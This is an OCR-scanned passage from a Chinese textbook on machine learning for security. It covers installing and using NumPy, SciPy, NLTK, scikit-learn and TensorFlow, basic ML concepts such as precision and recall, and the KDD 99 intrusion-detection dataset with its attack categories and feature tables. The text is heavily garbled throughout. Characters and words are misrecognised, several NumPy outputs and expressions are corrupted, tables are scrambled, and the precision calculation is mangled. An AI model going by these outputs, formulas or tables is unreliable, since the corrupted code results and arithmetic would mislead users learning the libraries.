各 种 场景 下 都 有 足够 的 数据 进行 训练 ， 这 个 时 候 不 同 算法 的 检测 效果 可 能 会 差别 很 大 ， 在 本 书后 面 的 例子 中 ， 大 家 可 以 发 现 相 同 的 问题 和 训练 集 下 ， 使 用 不 同 算法 结果 就 会 有 明显 差异 。 


1.6 EJA 


本 章 重点 介绍 人 工 智能 发 展 的 现状 、 互 联网 安全 严峻 形势 以 及 当前 人 工 智能 在 安全 领域 的 一 些 进 展 。 目 前 人 工 智能 在 安全 领域 的 应 用 还 处 于 起 步 和 探索 阶段 ， 深 入 研究 将 大 有 可 为 。 


我 写作 本 章 时 参考 了 以 下 网 站 ， 读 者 要 想 进一步 
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“ http://www.cnvd.org.cn/webinfo/show/3821 

- http://www.ccidnet.com/2016/0805/10162993.shtml 

: http://special.csdncms.csdn.net/security / 

: http://view.k618.cn/wlecy/201608/t20160826_8776204.htm 

- http://news.21cn.com/hotnews/a/2017/0420/10/32186159.shtml 
- http://www.freebuf.com/news/103646.html 

- http://www.freebuf.com/articles/database/97212.html 


- https://www.fireeye.com/blog/threat-research/2016/02/maimed_ramnit_still. html 


第 2 草 ”打造 机 器 学 习 工 具 箱 


在 机 器 学 习 领 域 ，Python 语 言 可 以 大 展 身 手 ， 因 为 Python 的 设计 哲学 是 “优雅 、 明 确 、 简 单 ”。Python 开 发 者 的 哲学 是 “用 一 种 方法 ， 最 好 是 只 有 一 种 方法 来 做 一 件 事 ”。 在 设计 Python 语言 时 ， 如 果 面 
临 多 种 选择 ，Python 开 发 者 一 般 会 拒绝 花 俏 的 语法 ， 而 选择 明确 的 没有 或 者 很 少 有 歧义 的 语法 。 由 于 这 种 设计 观念 的 影响 ，Python 源 代码 具备 更 好 的 可 读 性 ， 并 且 能 够 支撑 大 规模 的 软件 开发 。 几 乎 在 任何 涉 
及 软件 开发 的 领域 都 可 以 看 到 Python 的 身影 ， 在 机 器 学 习 领 域 它 更 是 威名 远扬 ， 大 量 的 优秀 机 器 学 习 库 都 是 基于 Python 开发 或 者 提供 Python 接口 的 。 所 以 本 章 重点 介绍 Python 语言 在 机 器 学 习 领 域 的 优势 和 应 


用 ， 包 括 几 个 重点 库 : NumPy、SciPy、NTLK、Scikit-Leatn 的 简介 、 环 境 依赖 以 及 安装 ， 最 后 介绍 TensofFlow 的 简介 及 安装 。 为 后 续 的 学 习 准 备 好 工具 箱 。 


2.1 Python 在 机 器 学 习 领 域 的 优势 


Python 在 机 器 学 习 领 域 应 用 广泛 (如 图 2-1 所 示 ) ， 我 认为 主要 原因 有 两 个 : 
语法 简单 ， 功能 强大 ; 
" 生态 完整 ， 具 备 丰 富 的 第 三 方 库 ， 对 应 的 机 器 学 习 库 非常 丰富 。 


下 面 将 重点 介绍 四 个 库 。 


2.1.1 NumPy 


NumPy 是 Python 的 一 种 开源 的 数值 计算 扩展 。 这 种 工具 可 用 来 存储 和 处 理 大 型 矩阵 ， 比 Python 自身 的 嵌 套 列表 结构 要 高 效 的 多 。 
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图 2-1 主流 基于 Python 的 机 器 学 习 库 

NumpPy 包 括 : 

一 个 强大 的 N 维 数组 对 象 Array; 

` 比较 成 熟 的 (广播 ) 函数 库 ; 

- 用 于 整合 C/C++ 和 Fortran 代 码 的 工具 包 ; 

. 实用 的 线性 代数 、 傅 里 叶 变 换 和 随机 数 生成 函数 。 

NumpPy 提 供 了 许多 高 级 的 数值 编程 工具 ， 如 : 矩阵 数据 类 型 、 矢 量 处 理 ， 以 及 精密 的 运算 库 ， 专 为 进行 严格 的 数字 处 理 。 
1. 安 装 方法 
pip install --user numpy 


2. 用 法 示例 
首先 需要 创建 数组 才能 对 其 进行 其 他 操作 。 


可 以 通过 给 array 函 数 传递 Python 的 序列 对 象 创建 数组 ， 如 果 传 递 的 是 多 层 坐 套 的 序列 ， 将 创建 多 维 数组 (下 例 中 的 变量 c) : 


>>> a = np.array([1, 2, 3, 4]) 

>>> b = np.array((5, 6, 7, 8)) 

>>> c = np.array([[1, 2, 3, 4],[4, 5, 6, 7], [7, 8, 9, 10]]) 

>>> b 

array([5, 6, 7, 8]) 

>>> c 

array([[1, 2, 3, 4], [4, 5, 6, 7], [7, 8, 9, 10]]) 
>>> c.dtype 

dtype ('int32"') 


数组 的 大 小 可 以 通过 其 shape 属 性 获得 : 


>>> a.shape 
(4,) 

>>> c.shape 
(3, 4) 


数组 元 素 的 存 取 方 法 和 Python 的 标准 方法 相同 : 


Pylearn2 
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scikit-learn 
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>>> a = np.arange( 

>>> a[5] # 短 狐 作为 下 标 可 以 获取 数组 中 的 基 个 元 素 
5 
>>> a[3:5] # 用 范围 作为 下 标 获 取 数 组 的 一 个 切片 ， 包 括 a[3] 不 包括 a[5] 
array([3, 4]) 

>>> a[:5] # 省 略 开 始 下 标 ， 表 示 从 a[0] 开 始 

array([0, 1, 2, 3, 4]) 

>>> a[:-1] # 下 标 可 以 使 用 负数 ， m ee 
array ([0, 1, 2, 3, 4, 5, 6, 7, 
>>> a[2:4] = 100,101 # 千 柑 还 可 以 用 来 修改 元 素 的 信 















































































































































>>> a 

array([ 0, 1, 100, 101, 4, 5, 6, Ty 8, 91) 

>>> a[1l:-1:2] 4 范围 中 的 第 mda 参数 表示 步 长 ，2 表 示 隔 一 个 元 素 取 一 个 元 素 
array([ 1, 101, 57 

>>> a[::-1] # nii ut 才 束 下 标 ， 步 长 为 -1， 整 个 数组 头 尾 颠倒 
array([ 9, 8, dy 4, 101, 100, hs 0]) 

>>> a[5:1:-2] 4 步 长 为 负 "T S ARD EEE OR 

array([ 5, 101]) 


和 Python 的 列表 序列 不 同 ， 通 过 下 标 范围 获取 的 新 的 数组 是 原始 数组 的 一 个 视图 。 它 与 原始 数组 共享 同一 块 数据 空间 : 






































>>> b = a[3:7] # 通过 下 标 范围 产生 一 个 新 的 数组 Bp，b 和 a 共享 同一 块 数据 空间 
>>> b 

array([101, 4, 55 61) 

>>> b[2] = -10 # 将 pb 的 第 2 个 元 素 修改 为 -10 

>>> b 

array ([101 4, -10, 














Soe nk ABT ER ST 10 
array([ 0, 1, 100, 101, 4, -10, 6, 7, 8, 9]) 





除了 使 用 下 标 范围 存 取 元 素 之 外 ，NumPy 还 提供 了 两 种 存 取 元 素 的 高 级 方法 。 
NumPy 和 MatLab 不 一 样 ， 对 于 多 维 数组 的 运算 ， 缺 省 情况 下 并 不 使 用 矩阵 运算 ， 如 果 你 希望 对 数组 进行 矩阵 运算 的 话 ， 可 以 调用 相应 的 函数 。 


NumpPy 库 提供 了 matrix 类 ， 使 用 matrix 类 创建 的 是 矩阵 对 象 ， 它 们 的 加 减 乘除 运算 缺 省 采用 和 矩阵 方式 计算 ， 因 此 用 法 和 MatLab 十 分 类 似 。 但 是 由 于 NumPy 中 同时 存在 ndarray 和 matrix 对 象 ， 用 户 很 
容易 将 两 者 弄 混 。 这 有 违 python 的 “ 显 式 优 于 隐 式 ”的 原则 ， 因 此 并 不 推荐 在 较 复杂 的 程序 中 使 用 matrix。 下 面 是 使 用 matrix 的 一 个 例子 : 


Ij 


>>> a = np.matrix([[1,2,3], [5,5,6], [7,9,9]]) 

>>> a*a**-] 

matrix([[ 1.00000000e+00, 1.66533454e-16, -8.32667268e-17], 
[ -2.77555756e-16, 1.00000000e+00,  -2.77555756e-17], 

[ 1.66533454e-16, 5.55111512e-17, 1.00000000e+00] 1) 
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和 矩阵 的 乘积 可 以 使 用 dot 函 数 进 行 计算 。 对 于 二 维 数组 ， 它 计算 的 是 和 矩阵 乘积 ， 对 于 一 维 数组 ， 它 计算 的 是 点 积 。 当 需要 将 一 维 数组 当 作 列 矢量 或 者 行 矢 量 进行 矩阵 运算 时 ， 推 荐 先 使 用 reshape 函 数 将 
一 维 数组 转换 为 二 维 数组 : 








>>> a = array([1, 2, 3]) 

>>> a.reshape((-1,1)) 

array([[1], [2], [3]]) 
>>> a.reshape ((1,-1)) 

array([[1, 2, 3]]) 








除了 dot 计 算 乘 积 之 外 ，NumPy 还 提供 了 inner 和 outer 等 多 种 计算 乘积 的 函数 。 这 些 函 数 计算 乘积 的 方式 不 同 ， 尤 其 是 当 处 理 多 维 数组 的 时 候 ， 更 容易 搞 混 。 下 面 分 别 介绍 这 几 个 函数 。 


dot: 对 于 两 个 一 维 的 数组 ， 计 算 的 是 这 两 个 数组 对 应 下 标 元 素 的 乘积 和 《数学 上 称 之 为 “内 积 ”) ; 对 于 二 维 数组 ， 计 算 的 是 两 个 数组 的 矩阵 乘积 ; 对 于 多 维 数组 ， 它 的 通用 计算 公式 如 下 ， 即 结果 
后 一 维 上 的 所 有 元 素 与 数组 b 的 倒数 第 二 位 上 的 所 有 元 素 的 乘积 和 。 





dot (a, b) [i,j,k,m] = sum(a[i,j,:] * b[k,:,m]) 


下 面 以 两 个 三 维 数 组 的 乘积 演示 一 下 dot 乘 积 的 计算 结果 。 


首先 创建 两 个 三 维 数组 ， 这 两 个 数组 的 最 后 两 维 满足 和 矩阵 乘积 的 条 件 : 











>>> a = np.arange (12) .reshape (2,3,2) 
>>> b = np.arange (12,24) .reshape (2,2, 3) 
>>> C = np.dot (a,b) 


dot 乘 积 的 结果 c 可 以 看 作 是 数组 a，b 的 多 个 子 和 矩阵 的 乘积 : 





















































>>> np.alltrue( c[0,:,0,:] == np.dot(a[0],b[0]) ) 
True 
>>> np.alltrue( c[1,:,0,:] == np.dot(a[1],b[0]) ) 
True 
>>> np.alltrue( c[0,:,1,:] == np.dot(a[0],b[1]) ) 
True 
>>> np.alltrue( c[1,:,1,:] == np.dot (a[1],b ) ) 
True 





inner: 和 dot 乘 积 一 样 ， 对 于 两 个 一 维 数组 ， 计 算 的 是 这 两 个 数组 对 应 下 标 元 素 的 乘积 和 ; 对 于 多 维 数组 ， 它 计算 的 结 
一 维 的 长 度 必 须 相 同 。 





后 一 维 的 内 积 ， 因 此 数组 a 和 b 的 最 后 


inner (a, b)[i,j,k,m] = sum(a[i,j,:]*b[k,m, :]) 


下 面 是 inner 乘 积 的 演示 : 


























>>> a = np.arange (12) .reshape (2,3,2) 

>>> b = np.arange (12,24) .reshape (2, 3,2) 
>>> c = np.inner (a,b) 

>>> c.shape (2, 3, 2, 3) 

>>> c[0,0,0,0] == np.inner(a[0,0],b[0,0]) 
True 

>>> c[0,1,1,0] == np.inner(a[0,1],b[1,0]) 
True 

>>> c[1,2,1,2] == np.inner(a[1,2],b[1,2]) 
True 





outer: 只 按照 一 维 数组 进行 计算 ， 如 果 传 入 参数 是 多 维 数组 ， 则 先 将 此 数组 展 平 为 一 维 数组 ， 之 后 再 进行 运算 。outer 乘 积 计算 的 列 向 量 和 行 向 量 的 和 矩阵 乘积 





>>> np.outer([1,2,3], [4,5,6,7]) 
array([[ 4, 5, 6, 7], [ 8, 10, 12, 14], [12, 15, 18, 21]]) 





和 矩阵 中 更 高 级 的 一 些 运算 可 以 在 NumpPy 的 线性 代数 子 库 linalg 中 找到 。 例 如 inv 函 数 计 算 逆 和 矩阵 ，solve 函 数 可 以 求解 多 元 一 次 方程 组 。 下 面 是 solve 函 数 的 一 个 例子 : 





>>> a = np.random.rand (10,10) 
>>> b = np.random.rand(10 
>>> x = np.linalg.solve (a,b) 

>>> np.sum(np.abs (np.dot (a,x) - b)) 
3.1433189384699745e-15 





— 
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2.1.2 Scipy 


SciPy 是 一 款 方 便 、 易 于 使 用 、 专 为 科学 和 工程 设计 的 Python 工具 包 ， 如 图 2-2 所 示 。 它 包括 统计 、 优 化 、 整 合 、 线 性 代数 模块 、 傅 里 叶 变 换 、 信 和 号 和 图 像 处理 、 常 微分 方程 求解 器 等 等 。 


S7 SciPy.org (ooo 


Install Documentation Report Bugs SciPy Central Blogs 


SciPy (pronounced "Sigh Pie") is a Python-based ecosystem of open-source software for mathematics, science, and 
engineering. In particular, these are some of the core packages: 


NumPy SciPy library Matplotlib 


Base N-dimensional Fundamental library l Comprehensive 2D 
array package for scientific Plotting 
computing 


IPython itis Sympy pandas 


Enhanced Interactive ” 4 Symbolic ! Data structures & 
Console i mathematics ; analysis 


IPI: 


IPython 


More information... 





图 2-2 SciPy E 5 


安装 方法 : 





pip install --user numpy scipy matplotlib iPython jupyter pandas sympy nose 


2.1.3 NLTK 


NLTK 在 NLP 领域 中 是 最 常 使 用 的 一 个 Python 库 ， 包 括 图 形 演示 和 示例 数据 ， 其 提供 的 教程 解释 了 工具 包 支 持 的 语言 处 理 任务 背后 的 基本 概念 。 
安装 程序 如 下 : 


pip install -U nltk 





加 载 数据 如 下 : 


>>> import nltk 
>>> nltk.download() 





用 法 示例 如 下 。 


分 词 与 标识 : 





>>> import nltk 
>>> sentence = """At eight o'clock on Thursday morning 

http: //www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16472/O0EBPS/Text/... Arthur didn't feel very good.""" 
>>> tokens = nltk.word tokenize (sentence) 

>>> tokens i 
['At', 'eight', "o'clock", 'on', 'Thursday', 'morning', 'Arthur', 'did', "n't", 
>>> tagged = nltk.pos tag (tokens) 
>>> tagged[0:6] 
[('At', 'IN'), ('eight', 'CD'), ("o'clock", 'JJ'), ('on', 'IN'), ('Thursday', 'NNP'), ('morning', 'NN')] 








Kari 


'feel', 'very', 'good', 











标识 名 词 实体 : 


>>> entities = nltk.chunk.ne chunk (tagged) 
>>> entities 








Tree ('S', [('At', 'IN'), ('eight', 'CD'), ("o'clock", 'JJ'), ('on', 'IN'), ('Thursday', 'NNP'), ('morning', 'NN'), 
Tree('PERSON', [('Arthur', 'NNP')]), 
('did', "VBD'), (CE; 'RB!), ('feel', 'VB'), 
('very', TRE'), ('good', 'JJ'), ('.', tate D 


展现 语法 树 (如 图 2-3) : 


>>> from nltk.corpus import treebank 
>>> t = treebank.parsed sents('wsj 0001.mrg')[0] 
>>> t.draw() 
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图 2-3 ”展现 语法 树 


2.1.4 Scikit-Learn 


scikit-Learn 是 基于 Python 的 机 器 学 习 模 块 ， 基 于 BSD 开 源 许 可 证 。 这 个 项 目 最 早 于 2007 年 发 起 ， 目 前 也 是 由 社区 自愿 者 进行 维护 的 。scikit-Learn 官 方 网 站 上 可 以 找到 相关 的 Scikit-Learn 的 资源 、 模 
块 下 载 、 文 档 、 例 程 等 等 。Scikit-Learn 的 基本 功能 主要 分 为 6 个 部 分 : 分 类 ， 回 归 ， 聚 类 ， 数 据 降 维 ， 模 型 选择 ， 数 据 预 处 理 。 具 体 可 以 参考 官方 网 站 上 的 文档 ， 见 图 2-4。 

依赖 的 环境 : 

- Python (>=2.6 or >=3.3) 

- NumPy (>=1.6.1) 


* SciPy (>=0.9) 


Home Installation Documentation ~ Examples 


scikit-Llearn 


Machine Learning in Python 





图 2-4 Scikit-Learn 3. A 


安装 方法 : 


pip install -U scikit-learn 


2.2 TensorFlow 简 介 与 环境 搭建 


TensorFlow 是 一 个 采用 数据 流 图 、 用 于 数值 计算 的 开源 软件 库 〈 见 图 2-5) 。 节 点 在 图 中 表示 数学 操作 ， 图 中 的 线 则 表示 在 节点 间 相 互联 系 的 多 维 数据 数组 ， 即 张 量 。 它 灵活 的 架构 使 你 可 以 在 多 种 平 
台 上 展开 计算 ， 例 如 台式 计算 机 中 的 一 个 或 多 个 CPU (或 GPU) 、 服 务 器 、 移 动 设备 等 等 。TensorFlow 最 初 由 Google 大 脑 小 组 (隶属 于 Google 机 器 智能 研究 机 构 ) 的 研究 员 和 工程 师 们 开发 出 来 ， 用 于 机 
器 学 习 和 深度 神经 网 络 方面 的 研究 ， 但 这 个 系统 的 通用 性 使 其 也 可 广泛 用 于 其 他 计算 领域 。 


TensorFlow 中 文 社 MPA] TERE HHS API 中 文 手 册 ”精华 文章 


TensorFlow 是 一 个 用 于 人 开 智 能 的 开源 神器 





图 2-5 TensorFlow 中 文 社区 主页 
TensorFlow 的 特点 : 
- 高 度 的 灵活 性 ，; 
. 真正 的 可 移植 性 ; 
:将 科研 和 产品 联系 在 一 起 ; 


-自动 求 微分 ; 


:性 能 最 优化 。 
安装 方法 如 下 : 


# 仅 使 用 CPU 的 版 本 
$ pip install https: 

//storage.googleapis.com/tensorflow/linux/cpu/tensorflow-0.5.0-cp27-none-linux x86 64.whl 
# 开启 GPU 支持 的 版 本 (安装 该 版 本 的 前 提 是 已 经 安装 了 CUDA sdk) 
$ pip install https: 
//storage.googleapis.com/tensorflow/linux/gpu/tensorflow-0.5.0-cp27-none-linux x86 64.whl 

























































































我 们 推荐 使 用 virtualenv 创 建 一 个 隔离 的 容器 来 安装 TensorFlow， 这 样 做 能 使 排查 安装 问题 变 得 更 容易 。 


首先 ， 安 装 所 有 必 备 工具 : 


# 在 Linux E: 

S sudo apt-get install python-pip python-dev python-virtualenv 
# 在 Mac E: 

$ sudo easy install pip # 如 果 还 没有 安装 pip 

$ sudo pip install --upgrade virtualenv 








接 下 来 ， 建 立 一 个 全 新 的 virtualenv 环 境 。 为 了 将 环境 建 在 ~/tensorflow 目 录 下 ， 执 行 : 








S virtualenv --system-site-packages -/tensorflow 
$ cd ~/tensorflow 





然后 ， 激 活 virtualenv: 








$ source bin/activate # 如 果 使 用 bash 
$ source bin/activate.csh # 如 果 使 用 csh 
(tensorflow)S # 终端 提示 符 应 该 发 生变 化 




















在 virtualenv 内 ， 安 装 TensorFlow: 





(tensorflow)$ pip install -U TensorFlow 





当 使 用 完 TensorFlow : 











(tensorflow)$ deactivate # 停 用 virtualenv 


2.3 “本章 小 结 


本 章 介绍 了 常见 的 机 器 学 习 工 具 ， 并 给 出 了 基本 的 安装 过 程 。 几 乎 再 难以 找到 一 门 语言 可 以 像 Python 这 样 受 欢 迎 ， 机 器 学 习 领域 尤其 如 此 。 现 在 我 们 已 经 打造 出 了 自己 的 机 器 学 习 工 具 箱 ， 让 我 们 开局 


我 写作 本 章 时 参考 了 以 下 网 站 ， 读 者 要 想 进一步 学 习 ， 欢 迎 到 这 些 网 站 进一步 了 解 更 多 信息 : 


4k 


“ http:/ /www.numpy.otg/ 

: https:/ /www.scipy.otg/ 

“ http:/ /www.nltk.otg/ 

- http:/ /scikit-leatn.org/stable/modules/decomposition.html 
“ http://www.tensorfly.cn/ 


- http://blog.csdn.net/pianoorrock /article/details/70174810 


第 3 章 ” 机 器 学 习 概 述 


机 器 学 习 的 概念 非常 多 ， 从 有 监督 到 无 监督 ， 从 聚 类 到 回归 ， 从 浅 层 学 习 到 深度 学 习 ， 从 准确 率 到 召回 率 ， 它 们 究竟 是 什么 意思 呢 ? 本 章 将 介绍 最 主要 的 几 个 概念 。 不 少 机 器 学 习 初 学 者 甚至 包括 业内 
老司 机 ， 一 直 被 困扰 的 就 是 如 何 找到 合适 的 训练 数据 和 测试 数据 ， 针 对 数据 的 处 理 也 花费 了 大 量 人 力 物 力 ， 完 竟 如 何 把 身边 各 种 形态 的 实物 最 终 转 换 成 机 器 可 以 理解 的 数字 特征 呢 ? 本 章 将 介绍 数据 集 的 获 
取 与 特征 提取 方案 。 本 章 介 绍 的 数据 集 包 括 KDD 99、SEA、ADFA-LD 等 共 10 类 ， 重 点 介绍 如 何 针 对 数字 型 和 文本 型 的 数据 进行 特征 提取 以 及 常见 的 数据 读 取 方 式 ， 最 后 介绍 如 何 对 机 器 学 习 的 结果 进行 验 


证 。 


3.1 机 器 学 习 基 本 概念 


1. 有 监督 学 习 : 对 具有 概念 标记 (DR) 的 训练 样本 进行 学 习 ， 以 便 尽 可 能 对 训练 样本 集 外 的 数据 进行 标记 (分类) 预测 。 这 里 ， 所 有 的 标记 (32$) 是 已 知 的 。 因 此 ， 训 练 样本 的 歧义 性 低 。 


2. 无 监督 学 习 : 对 没有 概念 标记 (分类) 的 训练 样本 进行 学 习 ， 以 便 发 现 训练 样本 集中 的 结构 性 知识 。 这 里 ， 所 有 的 标记 (分类) 是 未 知 的 。 因 此 ， 训 练 样本 的 歧义 性 高 。 聚 类 就 是 典型 的 无 监督 学 


3. 准 确 率 与 召回 率 : 信息 检索 、 分 类 、 识 别 、 翻 译 等 领域 中 有 两 个 最 基本 指标 : 召回 率 (Recall Rate) 和 准确 率 (Precision Rate) ， 召 回 率 也 叫 查 全 率 ， 准 确 率 也 叫 查 准 率 。 


对 一 个 二 分 问题 来 说 ， 会 出 现 四 种 情况 。 如 果 一 个 实例 是 实际 为 真 并 且 也 被 预测 成 真 ， 即 为 真正 类 (True positive, TP) ， 如 果实 际 为 假 被 预测 成 真 ， 称 之 为 假 正 类 (False positive, FP) 。 相 应 
如 果实 际 为 假 被 预测 成 假 ， 称 之 为 真 负 类 (True negative, TN) ， 实 际 为 真 被 预测 成 假 则 为 假 负 类 (false negative, FN) 。 


G 


召回 率 和 准确 率 的 关系 如 表 3-1 所 示 。 


表 3-1 召回 率 与 准确 率 的 关系 


实际 为 真 实际 为 假 


预测 为 真 TP FP， 其 实 就 是 误 报 
预测 为 假 FEN ， 其 实 就 是 漏 报 TIN 





召回 率 =TP/ (TP-EN) 
准确 率 =TP/ (TP+FP) 


用 一 个 吃 货 都 可 以 理解 的 例子 来 解释 这 两 个 枯燥 的 概念 : 一 个 池塘 有 10 条 鱼 和 20 只 小 龙虾 ， 渔 夫 撒 网 打 鱼 ， 结 果 捞 上 来 8 条 鱼 12 只 小 龙虾 ， 那 么 准确 率 为 80 (8-12) =40%， 召 回 率 为 8/10=80%。 


3.2 ”数据 集 


数据 集合 和 算法 就 像 黄 油 和 面包 一 样 缺 一 不 可 ， 很 多 时 候 数 据 比 算法 还 要 重要 。 本 书 的 例子 涉及 的 数据 主要 来 自 多 年 搜集 的 开源 数据 集合 以 及 部 分 脱 敏 的 测试 数据 。 


3.2.1 KDD 99 数 据 


KDD 是 知识 发 现 与 数据 挖掘 (Knowledge Discovery and Data Mining) 的 简称 ，KDD CUP 是 由 ACM 组 织 的 年 度 竞赛 如 图 3-1 所 示 。KDD 99 数 据 集 就 是 KDD 竞 赛 在 1999 年 举行 时 采用 的 数据 集 。 


b. 


| 


J“. CONGRATULATIONS! 
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KDD CUP 
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1998 年 美国 国防 部 高 级 研究 计划 局 (DARPA) 在 MIT 林 肯 实 验 室 进行 了 一 个 入 侵 检测 评估 项目。 林肯 实验 室 建 立 了 模拟 美国 空军 局 域 网 的 一 个 网 络 环境 ， 收 集 了 9 周 的 网 络 连接 和 系统 审计 数据 ， 仿 真 
各 种 用 户 类 型 、 各 种 不 同 的 网 络 流量 和 攻击 手段 ， 使 它 就 像 一 个 真实 的 网 络 环境 。 一 个 网 络 连 接 定 义 为 : 在 某 个 时 间 内 从 开始 到 结束 的 TCP 数 据 包 序列 ， 并 且 在 这 段 时 间 内 ， 数 据 在 预定 义 的 协议 下 从 源 IP 
地 址 到 目的 IP 地 址 的 传递 。 每 个 网 络 连接 被 标记 为 正常 (normal) 或 异常 (attack) ， 有 异常 类 型 被 细 分 为 4 大 类 共 39 种 攻击 类 型 ， 其 中 22 种 攻击 类 型 出 现在 训练 集中 ， 另 有 17 种 未 知 攻击 类 型 出 现在 测试 集 
中 ， 见 表 3-2。 


表 3-2 KDD 99 攻 击 类 型 详情 
攻击 大 类 攻击 描述 攻击 名 称 攻击 大 类 攻击 描述 攻击 名 称 
dos 拒绝 服务 攻击 Back r2 来 自 远 程 主机 的 未 授 —— ftp write 


Land 权 访 问 imap 
Neptune multihop 
Pod phf 

Smurf spy 
Teardrop 等 warezclient 


warezmaster 等 


u2r 非法 的 本 地 超级 用 户 。 buffer overflow probe 闪 口 监视 或 扫 摘 Portsweep 
特权 访问 loadmodule Ipsweep 
perl Satan 等 
rootkit 等 


随后 来 自 哥伦比亚 大 学 的 sal stolfo 教 授 和 来 自 北 卡 罗 莱 纳 州 立 大 学 的 Wenke Lee 教 授 采 用 数据 挖掘 等 技术 对 以 上 数据 集 进 行 特征 分 析 和 数据 预 处 理 ， 形 成 了 一 个 新 的 数据 集 。 该 数据 集 用 于 1999 年 举 
行 的 KDD 竞 赛 中 ， 成 为 著名 的 KDD 99 数 据 集 。 虽 然 年 代 有 些 久 远 ,但 KDD99 数 据 集 仍然 是 网 络 入 侵 检测 领域 的 权威 测试 集 ， 为 基于 计算 智能 的 网 络 入 侵 检 测 研究 莫 定 基础 。 


KDD99 数 据 集中 每 个 连接 用 41 个 特征 来 描述 : 








,i,0.00,0.00,0.00,0.00,1.00,0.00,0.00,255,254,1.00,0.01,0.00,0.00,0.00,0.00,0.00,0.00,normal. 
1,1,0.00,0.00,0.00,0.00,1.00,0.00,0.00,255,254,1.00,0.01,0.00,0.00,0.00,0.00,0.00,0.00,normal. 
1,1,0.00,0.00,0.00,0.00,1.00,0.00,0.00,255,254,1.00,0.01,0.00,0.00,0.00,0.00,0.00,0.00,normal. 

,2,0.00,0.00,0.00,0.00,1.00,0.00,0.00,255,254,1.00,0.01,0.00,0.00,0.00,0.00,0.00,0.00, snmpgetattack. 


0, udp, private, SF,105,1 
0, udp, private, SF,105,1 
0, udp, private, SF,105,1 
0, udp, private, SF,105,1 















































上 面 是 数据 集中 的 3 条 记录 ， 以 CSV 格 式 写 成 ， 加 上 最 后 的 标记 (label) ， 一 共有 42 项 ， 其 中 前 41 项 特征 分 为 4 大 类 。 

. TCP 连 接 基 本 特征 ( 见 表 3-3) ， 基 本 连接 特征 包含 了 一 些 连 接 的 基本 属性 ， 如 连续 时 间 、 协 议 类 型 、 传 送 的 字 节 数 等 。 
`- TCP 连 接 的 内 容 特 征 ， 见 表 3-4。 

. 基于 时 间 的 网 络 流量 统计 特征 ， 见 表 3-5。 

- 基于 主机 的 网 络 流量 统计 特征 ， 见 表 3-6。 


表 3-3 KDD 99 TCP 连 接 基 本 特征 


特征 名 称 数据 类 型 
duration 连续 类 型 


protocol type 离散 类 型 


su attempted 


num root 


离散 

连续 

num file creations 连续 
num shells 连续 
连续 


num access files 


num outbound cmds 连续 


内 容 描述 
连接 持续 时 间 ， 以 秒 为 单位 ， 连 续 类 型 。 范 围 是 [0, 58329] 。 它 的 定义 是 从 TCP 连 
接 以 3 次 握手 建立 算 起 ， 到 FIN/ACK 连接 结束 为 止 的 时 间 ; 429 UDP 协议 类 型 ， 则 
将 每 个 UDP 数据 包 作 为 一 条 连接 。 数 据 集 中 出 现 大 量 的 duration=0 的 情况 ， 是 因为 该 
条 连接 的 持续 时 间 不 足 1 秒 
协议 类 型 ， 离 散 类 型 ， 共 有 3 种 : TCP, UDP, ICMP 


service 离散 类 型 ”目标 主机 的 网 络 服务 类 型 ， 离 散 类 型 ， 共 有 70 种 :“aol” 'auth' ' bgp’ < courier’ 
‘csnet ns’ ‘ctf? ‘daytime’ ‘discard’ ‘domain’ ‘domain u’ ‘echo’ ‘eco i’ 'ecr i’ ‘efs’ 
‘exec’ ‘finger’ ‘ftp’ ' ftp data’ ‘ gopher’ ‘harvest’ * hostnames’ ‘http’ ' http 2784’ 
‘http 443’ ‘http 8001’ ‘imap4’ ‘IRC’ ‘iso tsap’ ' klogin' 'kshell' ‘ldap’ ‘link’ 
‘login’ ‘mtp’ ‘name’ 'netbios dgm ‘netbios ns’ ‘netbios ssn’ ‘netstat’ “nnsp 'nntp' 
‘ntp u’ ‘other’ “pm dump’ ‘pop 2’ ‘pop 3’ ‘printer’ ' private’ ‘red i’ ' remote - 
job’ ‘rje’ ‘shell’ ‘smtp’ ‘sql net’ ‘ssh’ “Sunrpc ‘supdup’ “systat ‘telnet’ ‘tftp u’ 
‘tim i’ ‘time’ ‘urh i’ 'urp i’ ‘uucp 'uucp path’ ‘vmnet ‘whois’ ‘X11’ 'Z39 50’ 

flag 离散 类 型 ”连接 正常 或 错误 的 状态 ， 离 散 类 型 ， 共 11 BR: ‘OTH’ ‘REJ’ ‘RSTO’ ‘ RSTOSO' 
'"RSTR''S0' ‘SI’ 'S2' 'S3' “SF”“SH”。 它 表示 该 连接 是 否 按照 协议 要 求 开 
始 或 完成 。 例 如 SF ZANTE RIE HY EW IFA IL; SO 表示 只 接 到 了 SYN 请 求 数据 包 ， 而 
没有 后 面 的 SYN/ACK。 其 中 SF 表示 正常 ， 其 他 10 种 都 是 error 

src bytes 连续 类 型 “从 源 主机 到 目标 主机 的 数据 的 字 节 数 ， 连 续 类 型 ， 范 围 是 [0, 1379963888] 

dst_bytes 连续 类 型 “从 目标 主机 到 源 主 机 的 数据 的 字 世 数 ， 连 续 拓 型 ， 范 围 是 [0, 1309937401] 

land 离散 类 型 奋 连 接 来 自 / 送 达 同 一 个 主机 /端口 则 为 1， 否则 为 0， 离散 类 型 ，0 或 1 

wrong fragment 连续 类 型 ”错误 分 段 的 数量 ， 连 组 类 型 ， 范 围 是 [0, 3] 

urgent 连续 类 型 “加 急 包 的 个 数 ， 连 续 类 型 ， 范 围 是 [0, 14] 

A34 KDD 99 TCP 连 接 的 内 容 的 特征 
特征 名 称 数据 类 型 内 容 描述 
hot 连续 类 型 ”访问 系统 敏感 文件 和 目录 的 次 数 ,， 连续， 范围 是 [0, 101]。 例 如 访问 系统 目录 ， 
建立 或 执行 程序 等 

num failed logins ”连续 类 型 ” 痘 录 尝试 失败 的 次 数 。 连 续 ， 泡 围 是 [0, 5] 

logged in 离散 类 型 ”成 功 登 录 则 为 1， 否则 为 0， 离散 ， 取 值 是 0 或 1 

num compromised ”连续 类 型 compromised 条 件 出 现 的 次 数 ， 连 续 ， 范 围 是 [0, 7479] 

root shell 离散 类 型 FARAH root shell 则 为 1， 否则 为 0， 离 藤 ， 取 值 是 0 或 1。root shell 是 指 获得 


超级 用 户 权 限 


类 型 “看 出 现 “sutroot ”命令 则 为 1， 否则 为 0， 离散 ， 取 值 是 0 或 1 
去 类 型 ”root 用 户 访 问 次 数 ， 连 续 ， 范 围 是 [0, 7468] 
类 型 “文件 创建 操作 的 次 数 ， 连 
LKA ”使 用 shell 命令 的 次 数 ， 连 续 ， 范 围 是 [0, 5] 
